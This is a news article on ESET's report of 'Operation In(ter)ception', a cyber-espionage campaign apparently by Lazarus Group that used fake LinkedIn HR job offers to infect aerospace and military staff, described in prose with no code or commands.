Hackers are targeting aerospace and military staff using a new hacking campaign where they disguise as fake human resource (HR) officers and offer fake jobs. According to The Hacker News' latest report, the new sophisticated cyber-espionage campaign was discovered on June 17 by cybersecurity researchers.
Also Read: DDoS Attacks Hit US Leaving T-Mobile, Facebook, and Other Services Down
Hacker's New Campaign Targets Military and Aerospace Staff: Operation In(ter)ception uses BEC Attack
The new scheme, whose aim is to spy on key employees of the targeted firms and also to siphon money from them, has been directed against military and aerospace organizations in the Middle East and Europe. The security researchers stated that the hacking campaign called "Operation In(ter)ception," took place between September to December 2019. The malicious campaign was named "Inception" in the malware sample.
Also Read: [Hackers] Taiwan's CDC Tricked by 'Vendetta' Hackers in Data Theft Campaign; Australian Websites Sold on Dark Web
"The primary goal of the operation was espionage," said the researchers. "However, in one of the cases we investigated, the attackers tried to monetize access to a victim's email account through a business email compromise (BEC) attack as the final stage of the operation."
Operation In(ter)ception: The hacking campaign targetting military and aerospace staff
ESET, a cybersecurity firm, suspected a notorious hacking group called Lazarus Group, because of the financial motivation behind the attacks, coupled with similarities in development and targeting environment. The Lazarus Group has been funding North Korea's illicit weapon and missile programs by working on behalf of the country's government.
ESET claimed that the hacking campaign was highly directed, with cybercriminals posing as HR managers of well-known companies in the defense and aerospace industry, including General Dynamics and Collins Aerospace. The hacking campaign used fake job offers using LinkedIn's messaging features, relying on social engineering tricks to lure employees working for the chosen companies.
According to We Live Security's report, the cybercriminals either used a combination of email and OneDrive or used LinkedIn directly, to send the malicious files. Fake email accounts corresponding to their fake LinkedIn personas, which includes OneDrive links hosting the files, were used as a latter option of the hackers.
Hacker's New Campaign Targets Military and Aerospace Staff: Operation In(ter)ceotion uses BEC Attack
The report stated that the shared file, which was a password-protected RAR archive, contains an LNK file that will open a remote PDF file in the target's default browser when the victim opens the LNK file, starting a Command Prompt. The malicious PDF served as a decoy, seemingly containing salary information for the job positions.
The Command Prompt copies the WMI Commandline Utility (WMIC.exe), renaming the utility in the process to create a new folder. A scheduled task is then created during the process to execute a remote XSL script periodically via the copied file. This allows hackers to gain persistence on the compromised computer, enabling them to get their initial foothold inside the targeted company.
The report claimed that the cybercriminals exfiltrate data gathered from their targets using an open-source command-line client from Dropbox, a custom build of dbxcli. However, the security researchers were not able to identify the content of the malicious files. Hackers were interested in business-related and technical information as suggested by the job titles of the employees targeted via LinkedIn.
